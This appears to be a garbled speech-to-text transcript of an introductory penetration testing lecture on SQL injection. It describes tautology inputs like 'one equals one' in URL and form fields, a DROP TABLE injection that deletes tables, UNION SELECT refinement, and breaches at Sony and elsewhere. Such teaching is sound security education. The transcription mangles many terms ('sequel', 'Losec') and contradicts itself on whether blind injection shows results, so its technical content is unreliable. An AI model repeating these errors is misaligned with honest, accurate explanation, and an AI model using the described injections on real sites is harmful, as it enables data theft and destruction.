Welcome to Cyber Eri. I am Raymond Evans and I will be your subject matter expert for Cyber Aires. Web app. Penetration tasting course
this video. We will be discussing sequel injection. So what will be covered?
What a sequel injection, how it works. Some types of some examples. So what is the sequel? Inject
Well, A sequel Inject is a code injection attack, which takes advantage of improperly filtered user input to a numerator and manipulated database.
What exactly does that mean? Well, an attacker can use a statement to send commands to a sequel database and get information back from it.
Jack and I can also use this statement to manipulate data on the database as well, such as doing things like
dumping an entire database two types of sequel injections. We will be covering our classic sequel Injections or Sq Ally
and Blind sequel Injections or Blind Sq Ally
I'm Gonna Be Interchanging sequel Inject and SQL I throughout this course, because that's how you will see it in the real world. You'll see
both of those terms used, so it's a classic sequel injection.
Well, the simple injection encourage when escape characters are improperly filtered,
escape character is something like a single or a double quote
on these air used to denote the end of something and then the beginning of a series of commands. A sequel, Injection
Command. ISS then sent
two the sequel application.
The results are immediately displayed to the Attacker
Classic sequel Injections. You realize where Klaus Modification and union operator injections to exploit the improper filtering,
modifications you will be seeing later on it will be explaining them further. Blind Sequel Injection is a form of sequel injection,
with the same exact thing as normal sequel injection. Except the attacker is able to immediately see the results
for Web application that needs tested for blind sequel injection. It's best to use an automated tool.
Such is one that tells us to blow or, if you want, you can also craft a statement with a sequel, inject to do something like create a user account or had some kind of data to the database. If this works, then you know that it's vulnerable to a blind sequel. Inject so
I can't perform a sequel, inject and get data immediately back. However, they can perform a blind sequel inject to do something like dump the database or at a user account for themselves to gain access. Where would you exactly inject, though
Well, secret injections could be placed in various portions of a Web page and the source code of the page itself as well.
the two most common areas you will find them
are in the URL and inform fields. And here we see
couple examples of those attacks in those different fields in the U. R l here we see in the 1st 1 that uses a single escaped capture to tryto discover if a sequel injection as possible.
Sending with the 2nd 1 is using escape character to try to get a sequel. Error back.
1/3 1 here it actually uses a one equal one statement
and this would be used. Tried a
Same thing with in the form field. Here
you are telling it that you're looking for
anything any use dream. It has one or any user name that is true. So it'll it'll dump out all the user data names to you because they all the all the user names are true in fact, So why is that pleases dangerous Well,
what website is vulnerable to a sequel injection? The site may disclose a lot of sense of information. Stuff like credit card data, Social Security numbers, addresses, usually human passwords.
This data can be used to steal identities and money, or it could be used to con victims over a long period of time.
In the case of usernames and passwords, this could be used to
get admin credentials and elevate their privileges on a system as well. So that's one. That's another reason why it's really, really dangerous is because of privilege escalation. If something like this goes unchecked for years upon years
on, attacker could just sit back and siphon off data. Just steal credit cards. Is there security numbers for many, many years?
If it's left unchecked, and if there's nothing set up like an I. D. S.
Oh, are an I. P. S to identify these kept type of attacks. So here's a couple of examples of sequel injections.
So in our 1st 1 here
we see that one equal 11 equals one statement again.
So this queer is recognized as true, and we'll dump the database onto the screen. This is one of most common examples that you will see, and it's amazing how much this works Now
trick a system even if it's filter in the classic. One equals one. Because as long as any variables are in there whatsoever,
it will do this. So you could d'oh! Tim or Bob equals Bob. As long as that statement
and the second portion is equal and correct, it'll dump the database for you.
So that's something you know, Watch out for you know, if you say Oh, hey, it's cool. We got the classic. One equals one filtered
Well, do you have a banana? Is banana? Our dog equals dog?
I don't think so. And next we have an example which is asking to display every column from every table where the I d equals one which would display the entire database.
This type of statement could be used to refine your search even further. So here we see select star from Star where I'd equals one
Now those star spots there
can be used to refine your search is so that star represents a variable for everything.
So you're saying select everything from everything. Ride equals one. So you could say something like
select user names or users if you know the tables called users,
and you would get a list of everybody named Frank from that database. Next we see an example of how to modify something
on the table, and what we're doing is saying Select everything from everything where I d equals one and then it says, Drop table
everything. If your database was vulnerable to sequel injections and somebody was to put this in there,
could and would drop your your tables, which is really bad, because it would be deleting your database. Our final example. Here the statement blow uses a sequel, post injection, to refine its attacks. Even more So is showing, like above. Select a variable
from a variable where type I d equals one,
and then it uses a Union select union all select statement.
Thio. Define it even further. This type of ah of sequel post injection will most likely be used with a program such as sequel map, which we will be showing later on, and I will be demonstrating later on
how to create a more refined search with this string here. Right now, it seems
a lot of, Ah, garbage to you. But once we actually
practice it and show how it's used will make a lot more sense. So where someone really world Examples of
sequel injection is being used in impacting people.
Well. In 2008 sexual and violent Offenders Registry of Oklahoma had 10,597 secure Social Security numbers belonging to sexual offender stolen via sequel inject. 2002 guest dot com was vulnerable to a sequel injection attack. Pretty remaining anybody can.
Who can construct a properly crafted girl to pull down
200,000 plus names, credit card numbers and expiration dates in the sights customer database.
And then, in 2011 Little SEC
was accused of using sequel injection to steal coupons, download keys and passwords that were stored in plain text on Sony's website. So the guest dot com vulnerability, the sequel injection vulnerability that was there was one of the one equals, one statements that
in the earl itself. So that's one example of where that was used, and that's for the 2011 Losec attack. You never store anything that sensitive in plain Tex ever anywhere.
So it was covered Well, I talked about what a sequel inject ISS, showed a couple eggs of examples, talked about outworks, talked about some types of sequel of injections and then gave you some real world examples.
I'd be hacking everyone.